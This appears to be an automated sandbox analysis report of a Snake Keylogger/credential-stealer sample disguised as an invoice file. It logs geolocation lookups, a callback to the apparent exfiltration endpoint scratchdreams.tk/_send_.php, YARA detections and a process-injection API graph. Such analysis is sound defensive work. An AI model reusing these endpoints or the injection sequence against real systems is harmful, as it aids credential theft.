                                                            2024-05-03 13:18:57 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69
                                                            Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
                                                            2024-05-03 13:18:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549716172.67.177.1344436368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-03 13:18:59 UTC63OUTGET /xml/191.96.227.219 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-05-03 13:18:59 UTC708INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:59 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 3
                                                            Last-Modified: Fri, 03 May 2024 13:18:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tmgTui357ly32WDnrM%2FfbNLSOySu%2FxGn3axN9KuOe4p9OT%2BTWl%2F4%2BpdN1c4AM5zU54sfHoCTdbx9Nefo3zQFdPF3zf6KHHVSsKGO%2BonymMpUctXGmkwdU3SZ04QdRxJJqpFNR1fd"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87e08a4368a0425e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-03 13:18:59 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69
                                                            Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
                                                            2024-05-03 13:18:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549718172.67.177.1344436368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-03 13:19:00 UTC87OUTGET /xml/191.96.227.219 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-03 13:19:00 UTC706INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:19:00 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 4
                                                            Last-Modified: Fri, 03 May 2024 13:18:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BaTM%2BFCjyVxjiyzJI0a%2B9P0ZflV4efQVKxdhikll32rt4VP3gCP9ML1PILz0Ze43JRsrJnq%2B4HVY2Ot5N8A9rh9EjIgn0OKBsE7GyJbnp2g2Ad6A37nQDVh2Zoxqd1M8h%2FhZcf8o"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87e08a4a28cf1a3c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-03 13:19:00 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69
                                                            Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
                                                            2024-05-03 13:19:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549720172.67.177.1344436368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-03 13:19:00 UTC87OUTGET /xml/191.96.227.219 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-03 13:19:01 UTC714INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:19:01 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 5
                                                            Last-Modified: Fri, 03 May 2024 13:18:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QXTzEsgUmVQoi%2FRZgHUbnoIduJplVMiCOYby3PGzr%2BmCLUAwUqFAZ%2BiD%2Bb0myErpDbUxxU2iOUEFbzUy%2FO37%2Bu%2FR2OfL07dWfjf9fwJL4bE1v%2FWa%2BrDpqL6xM3N3H7WIxKLXpaso"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87e08a4ffe9843a9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-03 13:19:01 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69
                                                            Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
                                                            2024-05-03 13:19:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549722172.67.177.1344436368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-03 13:19:01 UTC87OUTGET /xml/191.96.227.219 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-03 13:19:01 UTC704INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:19:01 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 5
                                                            Last-Modified: Fri, 03 May 2024 13:18:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=27PCZLAZAId3Oyct1VKFNWczwe7XljNAxcv%2FuqfWVgC5BdHOjfer2uEufoFf51GTK1U4sQK1s2NKiqnLY%2BsPqxVKtnYVz1W83%2FUstFIBQh3KKgGpxrSq7MRLJEJtxrUGkhu%2BNsft"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87e08a551af57c7b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-03 13:19:01 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69
                                                            Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
                                                            2024-05-03 13:19:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549724172.67.177.1344436368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-03 13:19:02 UTC87OUTGET /xml/191.96.227.219 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-03 13:19:02 UTC698INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:19:02 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 6
                                                            Last-Modified: Fri, 03 May 2024 13:18:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oZazoxRapQ5NnbAJb0NZAPaZLmF4uxtqrIdRNwPY42v298R48u4oBtxjdHDnMqr8otY7MmgvUF88oNuTKb%2Br2AmnPJGlrfp0VuovLRwbCogP3EQjCSIEIHG3bOxiNSlAo6rD4bFh"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87e08a5a2f3641c0-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-03 13:19:02 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69
                                                            Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
                                                            2024-05-03 13:19:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549725104.21.27.854436368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-03 13:19:04 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                            Host: scratchdreams.tk
                                                            Connection: Keep-Alive
                                                            2024-05-03 13:19:43 UTC741INHTTP/1.1 522
                                                            Date: Fri, 03 May 2024 13:19:43 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 15
                                                            Connection: close
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NHUF79ryWUg4snsH4DsGmphHPAwyFvtCfUxce85%2FDrYDPtPJbVrH5tsh%2FZlpySiRJALW%2F9h2UmODIpJURq2wS4effqQCy47VLub%2FBO%2FPwkh0BL1HqOYVYGcRJI%2FWVlqlWOEJ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 87e08a64fb7cc45e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-03 13:19:43 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                            Data Ascii: error code: 522


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:15:18:50
                                                            Start date:03/05/2024
                                                            Path:C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\FATURA VE BELGELER..exe"
                                                            Imagebase:0x6d0000
                                                            File size:964'608 bytes
                                                            MD5 hash:C62DA7A3EAC6BAE78EA8A771FAA65D17
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1990854679.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1988410714.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1988410714.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:15:18:51
                                                            Start date:03/05/2024
                                                            Path:C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\FATURA VE BELGELER..exe"
                                                            Imagebase:0x600000
                                                            File size:964'608 bytes
                                                            MD5 hash:C62DA7A3EAC6BAE78EA8A771FAA65D17
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:11.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:2%
                                                              Total number of Nodes:539
                                                              Total number of Limit Nodes:14
                                                              execution_graph 41906 28ad118 41907 28ad15e 41906->41907 41911 28ad2f8 41907->41911 41914 28ad2e9 41907->41914 41908 28ad24b 41912 28ad326 41911->41912 41917 28aca00 41911->41917 41912->41908 41915 28aca00 DuplicateHandle 41914->41915 41916 28ad326 41915->41916 41916->41908 41918 28ad360 DuplicateHandle 41917->41918 41919 28ad3f6 41918->41919 41919->41912 42310 28a4668 42311 28a467a 42310->42311 42312 28a4686 42311->42312 42316 28a4778 42311->42316 42321 28a3e1c 42312->42321 42314 28a46a5 42317 28a479d 42316->42317 42325 28a4878 42317->42325 42329 28a4888 42317->42329 42322 28a3e27 42321->42322 42337 28a5c1c 42322->42337 42324 28a7048 42324->42314 42327 28a4888 42325->42327 42326 28a498c 42326->42326 42327->42326 42333 28a449c 42327->42333 42331 28a48af 42329->42331 42330 28a498c 42330->42330 42331->42330 42332 28a449c CreateActCtxA 42331->42332 42332->42330 42334 28a5918 CreateActCtxA 42333->42334 42336 28a59db 42334->42336 42338 28a5c27 42337->42338 42341 28a5c3c 42338->42341 42340 28a70ed 42340->42324 42342 28a5c47 42341->42342 42345 28a5c6c 42342->42345 42344 28a71c2 42344->42340 42346 28a5c77 42345->42346 42347 28a5c9c 2 API calls 42346->42347 42348 28a72c5 42347->42348 42348->42344 42367 4b20040 42368 4b201cb 42367->42368 42369 4b20066 42367->42369 42369->42368 42372 4b202c0 PostMessageW 42369->42372 42374 4b202ba PostMessageW 42369->42374 42373 4b2032c 42372->42373 42373->42369 42375 4b2032c 42374->42375 42375->42369 42376 50391b0 42377 50391b3 42376->42377 42378 5036e34 2 API calls 42377->42378 42379 50391cb 42378->42379 42380 5039202 42379->42380 42381 28a8349 2 API calls 42379->42381 42382 28a8369 2 API calls 42379->42382 42383 28a83cc 2 API calls 42379->42383 42384 28a832d 2 API calls 42379->42384 42385 28a834d 2 API calls 42379->42385 42386 28a836d 2 API calls 42379->42386 42387 28a8341 2 API calls 42379->42387 42388 28a8361 2 API calls 42379->42388 42389 28a8345 2 API calls 42379->42389 42390 28a8365 2 API calls 42379->42390 42391 28a8339 2 API calls 42379->42391 42392 28a8359 2 API calls 42379->42392 42393 28a83bf 2 API calls 42379->42393 42394 28a5c9c 2 API calls 42379->42394 42395 28a833d 2 API calls 42379->42395 42396 28a835d 2 API calls 42379->42396 42397 28a8331 2 API calls 42379->42397 42398 28a8351 2 API calls 42379->42398 42399 28a8335 2 API calls 42379->42399 42400 28a8355 2 API calls 42379->42400 42381->42380 42382->42380 42383->42380 42384->42380 42385->42380 42386->42380 42387->42380 42388->42380 42389->42380 42390->42380 42391->42380 42392->42380 42393->42380 42394->42380 42395->42380 42396->42380 42397->42380 42398->42380 42399->42380 42400->42380 41920 285d01c 41921 285d034 41920->41921 41922 285d08e 41921->41922 41925 5030ad4 41921->41925 41934 5032c09 41921->41934 41926 5030adf 41925->41926 41927 5032c79 41926->41927 41929 5032c69 41926->41929 41959 5030bfc 41927->41959 41943 5032d90 41929->41943 41948 5032e6c 41929->41948 41954 5032da0 41929->41954 41930 5032c77 41937 5032c45 41934->41937 41935 5032c79 41936 5030bfc CallWindowProcW 41935->41936 41939 5032c77 41936->41939 41937->41935 41938 5032c69 41937->41938 41940 5032d90 CallWindowProcW 41938->41940 41941 5032da0 CallWindowProcW 41938->41941 41942 5032e6c CallWindowProcW 41938->41942 41940->41939 41941->41939 41942->41939 41945 5032db4 41943->41945 41944 5032e40 41944->41930 41963 5032e48 41945->41963 41966 5032e58 41945->41966 41949 5032e2a 41948->41949 41950 5032e7a 41948->41950 41952 5032e48 CallWindowProcW 41949->41952 41953 5032e58 CallWindowProcW 41949->41953 41951 5032e40 41951->41930 41952->41951 41953->41951 41956 5032db4 41954->41956 41955 5032e40 41955->41930 41957 5032e48 CallWindowProcW 41956->41957 41958 5032e58 CallWindowProcW 41956->41958 41957->41955 41958->41955 41960 5030c07 41959->41960 41961 503435a CallWindowProcW 41960->41961 41962 5034309 41960->41962 41961->41962 41962->41930 41964 5032e69 41963->41964 41969 5034292 41963->41969 41964->41944 41967 5032e69 41966->41967 41968 5034292 CallWindowProcW 41966->41968 41967->41944 41968->41967 41970 5030bfc CallWindowProcW 41969->41970 41971 50342aa 41970->41971 41971->41964 42401 6cce675 42402 6cce67b 42401->42402 42406 6ccede0 42402->42406 42418 6ccedd1 42402->42418 42403 6cce686 42407 6ccedfa 42406->42407 42408 6ccee1e 42407->42408 42430 6ccf381 42407->42430 42442 6ccf2c6 42407->42442 42447 6ccf4ea 42407->42447 42451 6ccf479 42407->42451 42456 6ccf348 42407->42456 42470 6ccf408 42407->42470 42482 6ccf1df 42407->42482 42486 6ccf66d 42407->42486 42498 6ccf312 42407->42498 42408->42403 42419 6ccedfa 42418->42419 42420 6ccf66d 6 API calls 42419->42420 42421 6ccf1df 2 API calls 42419->42421 42422 6ccf408 6 API calls 42419->42422 42423 6ccf348 6 API calls 42419->42423 42424 6ccf479 2 API calls 42419->42424 42425 6ccf4ea 2 API calls 42419->42425 42426 6ccee1e 42419->42426 42427 6ccf2c6 2 API calls 42419->42427 42428 6ccf381 6 API calls 42419->42428 42429 6ccf312 2 API calls 42419->42429 42420->42426 42421->42426 42422->42426 42423->42426 42424->42426 42425->42426 42426->42403 42427->42426 42428->42426 42429->42426 42433 6ccf278 42430->42433 42431 6ccf3d9 42431->42408 42432 6ccf99e 42511 6ccddc8 42432->42511 42515 6ccddd0 42432->42515 42433->42431 42433->42432 42434 6ccf8aa 42433->42434 42503 6ccda98 42433->42503 42507 6ccda91 42433->42507 42519 6ccdb40 42434->42519 42523 6ccdb48 42434->42523 42435 6ccfb5d 42443 6ccf74d 42442->42443 42527 6ccdc19 42443->42527 42531 6ccdc20 42443->42531 42444 6ccf76b 42535 6ccdcd8 42447->42535 42539 6ccdce0 42447->42539 42448 6ccf4d6 42448->42408 42452 6ccf482 42451->42452 42454 6ccdcd8 WriteProcessMemory 42452->42454 42455 6ccdce0 WriteProcessMemory 42452->42455 42453 6ccf5ae 42454->42453 42455->42453 42464 6ccdb48 Wow64SetThreadContext 42456->42464 42465 6ccdb40 Wow64SetThreadContext 42456->42465 42457 6ccf9b7 42466 6ccddc8 ReadProcessMemory 42457->42466 42467 6ccddd0 ReadProcessMemory 42457->42467 42458 6ccf278 42458->42457 42459 6ccf8aa 42458->42459 42461 6ccf3d9 42458->42461 42462 6ccda98 ResumeThread 42458->42462 42463 6ccda91 ResumeThread 42458->42463 42468 6ccdb48 Wow64SetThreadContext 42459->42468 42469 6ccdb40 Wow64SetThreadContext 42459->42469 42460 6ccfb5d 42461->42408 42462->42458 42463->42458 42464->42458 42465->42458 42466->42461 42467->42461 42468->42460 42469->42460 42471 6ccf278 42470->42471 42471->42470 42472 6ccf8aa 42471->42472 42474 6ccf3d9 42471->42474 42475 6ccf9b7 42471->42475 42480 6ccda98 ResumeThread 42471->42480 42481 6ccda91 ResumeThread 42471->42481 42478 6ccdb48 Wow64SetThreadContext 42472->42478 42479 6ccdb40 Wow64SetThreadContext 42472->42479 42473 6ccfb5d 42474->42408 42476 6ccddc8 ReadProcessMemory 42475->42476 42477 6ccddd0 ReadProcessMemory 42475->42477 42476->42474 42477->42474 42478->42473 42479->42473 42480->42471 42481->42471 42543 6ccdf5c 42482->42543 42547 6ccdf68 42482->42547 42487 6ccf67a 42486->42487 42489 6ccf278 42486->42489 42496 6ccdb48 Wow64SetThreadContext 42487->42496 42497 6ccdb40 